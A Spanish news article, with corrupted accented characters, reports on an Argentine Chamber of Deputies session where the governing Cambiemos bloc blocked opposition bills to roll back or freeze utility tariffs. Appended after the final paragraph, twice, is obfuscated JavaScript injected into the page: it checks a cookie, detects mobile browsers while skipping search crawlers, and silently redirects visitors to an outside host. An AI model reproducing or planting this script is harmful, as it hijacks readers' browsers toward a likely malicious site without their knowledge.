Oficialismo impuso su nA?mero en Diputados para frenar los proyectos contra aumentos de tarifas

El interbloque Cambiemos evitA? este miAi??rcoles el intento de los bloques opositores de debatir en sesiA?n especial una veintena de proyectos sobre las tarifas, desde retrotraerlas a diciembre del 2017 hasta congelar esos valores hasta fines del 2019 imponiendo su mayorAi??a numAi??rica. La oposiciA?n asegurA? que habrA? nuevos intentos. Tras seis horas de sesiA?n se levantA? el debate y se pospuso el tratamiento de la reforma de mercado de capitales para el 9 de mayo.

El primer proyecto que se debatiA? fue impulsado por el peronista Diego Bossio y arrojA? 132 votos a favor y 106 en contra, con lo cual no se obtuvieron los dos tercios para habilitar el tratamiento sobre tablas.

Al fundamentar su iniciativa, el diputado peronista y ex titular del Anses en el gobierno kirchnerista dijo que el oficialismo “no tiene voluntad polAi??tica” para discutir las tarifas y advirtiA? que desde el justicialismo no estA?n proponiendo “congelar las tarifas” sino “una propuesta seria” que permita “a las familias y a las pymes” pagar los servicios pA?blicos.

“No utilizamos el tema tarifas como una especulaciA?n polAi??tica. Queremos discutir un tema que afecta a miles de argentinos”, advirtiA? el diputado peronista, que remarcA? la necesidad de “resolver el tema de las tarifas para que haya mA?s crecimiento y mA?s producciA?n”.

Otro de los proyectos que se discutiA? fue propiciado por la presidenta del bloque del Frente Renovador, Graciela CamaAi??o, que proponAi??a la emergencia energAi??tica por un aAi??o y cuyo tratamiento sobre tablas fue trabado por la bancada del oficialismo por 134 a 100 votos, con lo cual no tuvo los dos tercios.

“Saludo que el oficialismo haya decidido venir en lugar de estar detrA?s de las cortinas como la semana pasada”, dijo la diputada, que cuestionA? que estAi??n “obstruyendo la sesiA?n para debatir el tema de las tarifas”.

AgregA? que “es la polAi??tica en este A?mbito la que tiene que resolver este tema grave” y recordA?: “Hace tres aAi??os que venimos planteando este tema, cuando el seAi??or Shell o Aranguren, que representa los intereses de sus propias acciones, con una caterva de funcionarios en los A?rganos de control a CEO de las empresas de energAi??a, aterrizA? en el A?rea energAi??tica”.

Por otra parte, tambiAi??n se rechazA? por 130 votos afirmativos y 102 en contra el tratamiento sobre tablas de un proyecto sobre tarifa social para empresas recuperadas presentado por el ex ministro de EconomAi??a del kirchnerismo Axel Kicillof, quien dijo que si la oposiciA?n se une puede “pararle la mano al Gobierno”.

La oposiciA?n parlamentaria reuniA? el quA?rum necesario para debatir en el recinto de la CA?mara de Diputados el proyecto de ley que modifica el esquema tarifario de servicios pA?blicos, tras su fracaso de hace una semana, cuando el interbloque Cambiemos no dio quA?rum para habilitar la sesiA?n especial.

El bloque justicialista, junto a los massistas, el kirchnerismo, la izquierda, y bancadas provinciales aseguraron el quA?rum para abrir la sesiA?n, por lo que el oficialismo se sumA?, con el fin de discutir la iniciativa plasmada en base a unos 26 proyectos que oscilaban entre atenuar las tarifas o congelarlas hasta el 2019.

Sin embargo, Cambiemos se negA? a tratar el tema por no contar con el dictamen necesario. En ese marco, el titular del interbloque oficialista, Mario Negri, anunciA? la convocatoria a la ComisiA?n de Presupuesto y Hacienda del cuerpo, que preside el macrista Luciano Laspina, para el miAi??rcoles prA?ximo a las 14, a fin de debatir los proyectos impulsados por la oposiciA?n que busca retrotraer los aumentos tarifarios y los actualiza a la variaciA?n salarial.

A su turno, Laspina advirtiA? a la oposiciA?n que “debe definir cA?mo se financiarA?n estos proyectos” tendientes a retrotraer las tarifas a diciembre y reducir el IVA que se aplican a los servicios pA?blicos y anticipA? que pedirA? al A?rea tAi??cnica del cuerpo en materia presupuestaria “un dictamen para determinar el costo fiscal” de esas iniciativas.

Al exponer en el primer tramo de la sesiA?n especial de la CA?mara de Diputados, Laspina desafiA? a los autores de los proyectos de la oposiciA?n que buscan frenar los aumentos tarifarios a decir de quAi?? manera se financiarAi??a la quita: “Tenemos que saber cuA?l es el costo fiscal de estos proyectos impulsados por aquellos que nos metieron en este problema”, disparA?.

AdemA?s, luego de fundamentar por quAi?? aA?n no convocA? a la comisiA?n que preside para el tratamiento de esas iniciativas, Laspina adelantA? que enviarA? “a la Oficina de Presupuesto” de la CA?mara de Diputados -un A?mbito tAi??cnico- el predictamen de las comisiones de Obras PA?blicas y Defensa del Consumidor firmado ayer para “determinar el costo fiscal”, de la iniciativa.

Por otro lado, en su exposiciA?n en el recinto, Laspina afirmA? que, “como un cuerpo responsable, debemos esperar el dictamen de la oficina del Congreso que todos hemos votado, para que nos digan, sin demagogia, cuA?nto es el costo fiscal y cA?mo la oposiciA?n lo quiere financiar”.

Laspina apuntA?, con ironAi??a, que la oposiciA?n debe definir cA?mo se solventarA? la baja de tarifas, “si es que van a subir impuestos o autorizar al Poder Ejecutivo a emitir mA?s deuda”.

El Congreso Nacional aprobA? en diciembre pasado el Presupuesto 2018, que estipulA? una baja en los subsidios para energAi??a en torno al 16,2 por ciento y del 5 por ciento en transporte para disminuir el dAi??ficit fiscal, que repercute en los aumentos tarifarios.

El frente opositor del justicialismo, el massismo y el kirchnerismo (con disidencias) dio ayer una fuerte seAi??al al obtener dictamen sobre el proyecto en un plenario de comisiones de Obras PA?blicas y Defensa del Consumidor, presididas por el justicialista Sergio Ziliotto y Marcela Passo, del Frente Renovador, respectivamente.

Ese texto no estaba en condiciones de ser abordado en el recinto con mayorAi??a simple, porque aA?n le restan los dictA?menes de Presupuesto y Hacienda y peticiones, las otras dos comisiones a las que fue girado, y cuyas presidencias estA?n en manos del oficialismo.

El Gobierno espera que en las prA?ximas semanas haya un acuerdo con los gobernadores para que el tema tarifario no se discuta en el Congreso. Pero mientras tanto logrA? postergar al menos hasta la semana que viene el tratamiento en Diputados. Hoy la oposiciA?n pudo expresarse contra el “tarifazo” y poner a votaciA?n todos los proyectos, aunque sin los 2/3 de los votos fueron rechazados.

La necesidad de un acuerdo con los mandatarios se debe a que el oficialismo tiene 30 dAi??as -segA?n se dispone en el reglamento en la CA?mara- desde que se reclama que se trate un proyecto en la ComisiA?n de Presupuesto y Hacienda.

En relaciA?n al dictamen de las comisiones de Obras y de Defensa del Consumidor, propone que las tarifas se incrementen de acuerdo a la variaciA?n salarial y eliminar el IVA que se cobra en los servicios pA?blicos.

En tanto, el oficialismo insistirA? en abordar el debate que le permita convertir en ley el proyecto de financiamiento productivo impulsado por el Poder Ejecutivo, tras fracasar la semana pasada en ese intento como consecuencia de la frustrada sesiA?n especial convocada por la oposiciA?n sobre el tema del aumento de tarifas.

La decisiA?n de postergar la sesiA?n ordinaria del miAi??rcoles pasado se adoptA? tras el fracaso de la sesiA?n especial que habAi??a sido convocada por la oposiciA?n para debatir proyectos para retrotraer las tarifas de servicios pA?blicos.

En esa circunstancia, el presidente de la CA?mara, Emilio MonzA? (PRO), informA? que la sesiA?n ordinaria pasarAi??a para esta semana.

La iniciativa que se pondrA? a consideraciA?n de los diputados tiene como objetivo potenciar el financiamiento de las pymes que hoy no tienen acceso al crAi??dito.

Entre otras cosas, elimina la facultad que desde 2013 tiene la ComisiA?n Nacional de Valores (CNV) de designar veedores con poder de veto en los directorios de las empresas.

TambiAi??n facilita el acceso de crAi??ditos para las pymes incorporando las letras hipotecarias, y crea una factura de crAi??dito electrA?nica para micropymes, de aceptaciA?n obligatoria a los 30 dAi??as de emitida, como si fuera un cheque.

El proyecto, aprobado el aAi??o pasado por la CA?mara de Diputados, recibiA? modificaciones en el Senado, que fueron ratificadas en el dictamen de mayorAi??a surgido de la reuniA?n de comisiA?n firmado la semana pasada, entre los que figuran la forma de designaciA?n del presidente de la CNV.

SegA?n el proyecto aprobado en primera instancia en Diputados, el funcionario quedaba confirmado si el Senado no se expedAi??a despuAi??s de 60 dAi??as de elevado el nombre del candidato por parte del Gobierno.

La modificaciA?n del Senado eliminA? ese acuerdo, adoptA?ndose en cambio el texto del artAi??culo 7 de la Carta OrgA?nica del Banco Central.

Otro cambio alude a las excepciones al pago del impuesto a las Ganancias para operaciones de compraventa de acciones, debido a que este punto se contradecAi??a con la ley de reforma tributaria ya aprobada, en la que sAi?? se gravaban esas operaciones.var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}